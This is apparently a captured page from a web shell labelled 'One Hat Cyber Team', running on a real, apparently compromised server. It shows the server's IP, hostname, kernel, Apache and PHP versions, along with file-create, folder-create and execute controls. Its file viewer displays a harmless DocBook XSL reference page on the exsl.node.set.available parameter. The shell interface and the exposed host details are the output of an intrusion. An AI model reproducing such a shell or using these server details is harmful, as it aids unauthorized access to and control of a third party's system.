One Hat Cyber Team
Your IP :
216.73.216.14
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
docbook-style-xsl
/
doc
/
fo
/
View File Name :
exsl.node.set.available.html
<html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>exsl.node.set.available</title><link rel="stylesheet" type="text/css" href="../reference.css"><meta name="generator" content="DocBook XSL Stylesheets V1.79.2"><link rel="home" href="../index.html" title="DocBook XSL Stylesheets: Reference Documentation"><link rel="up" href="misc.html" title="Miscellaneous"><link rel="prev" href="monospace.verbatim.font.width.html" title="monospace.verbatim.font.width"><link rel="next" href="show.bookmarks.html" title="show.bookmarks"><link rel="copyright" href="copyright.html" title="License"></head><body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"><div class="navheader"><table width="100%" summary="Navigation header"><tr><th colspan="3" align="center">exsl.node.set.available</th></tr><tr><td width="20%" align="left"><a accesskey="p" href="monospace.verbatim.font.width.html">Prev</a> </td><th width="60%" align="center">Miscellaneous</th><td width="20%" align="right"> <a accesskey="n" href="show.bookmarks.html">Next</a></td></tr></table><hr></div><div class="refentry"><a name="exsl.node.set.available"></a><div class="titlepage"></div><div class="refnamediv"><h2><span class="refentrytitle">exsl.node.set.available</span></h2><p>exsl.node.set.available — Is the test function-available('exsl:node-set') true?</p></div><div class="refsynopsisdiv"><h2>Synopsis</h2><a name="exsl.node.set.available.frag"></a><pre class="programlisting"><xsl:param name="exsl.node.set.available"> <xsl:choose> <xsl:when exsl:foo="" test="function-available('exsl:node-set') or contains(system-property('xsl:vendor'), 'Apache Software Foundation')">1</xsl:when> <xsl:otherwise>0</xsl:otherwise> </xsl:choose> </xsl:param> </pre></div><div class="refsection"><a name="d0e18684"></a><h2>Description</h2><p>If non-zero, then the exsl:node-set() function is available to be used in the stylesheet. If zero, then the function is not available. This param automatically detects the presence of the function and does not normally need to be set manually.</p><p>This param was created to handle a long-standing bug in the Xalan processor that fails to detect the function even though it is available.</p></div></div><div class="navfooter"><hr><table width="100%" summary="Navigation footer"><tr><td width="40%" align="left"><a accesskey="p" href="monospace.verbatim.font.width.html">Prev</a> </td><td width="20%" align="center"><a accesskey="u" href="misc.html">Up</a></td><td width="40%" align="right"> <a accesskey="n" href="show.bookmarks.html">Next</a></td></tr><tr><td width="40%" align="left" valign="top">monospace.verbatim.font.width </td><td width="20%" align="center"><a accesskey="h" href="../index.html">Home</a></td><td width="40%" align="right" valign="top"> show.bookmarks</td></tr></table></div></body></html>